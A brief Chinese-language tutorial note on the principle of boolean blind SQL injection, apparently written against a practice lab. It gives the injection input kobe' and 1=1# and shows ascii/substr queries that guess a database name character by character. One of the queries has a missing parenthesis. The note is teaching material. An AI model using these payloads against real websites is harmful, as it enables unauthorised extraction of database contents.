关于bool盲注的原理:由于对方后端对用户的显示页面进行了处理,我们无法看到返回的数据库报错内容
由于进行处理,我们在页面输入框中输入‘时不会返回数据库报错内容
输入kobe’ and 1=1#
我们可以使用select语句去判断:
select ascii(substr(database(),1,1))>113; 它会返回0或者1,0是错的意思,1是对的意思
select ascii(substr(database(),1,1)>112; 通过判断0或者1
通过多次查询,我们可以确定出数据库的名称,例如ascii码里的112对应的就是p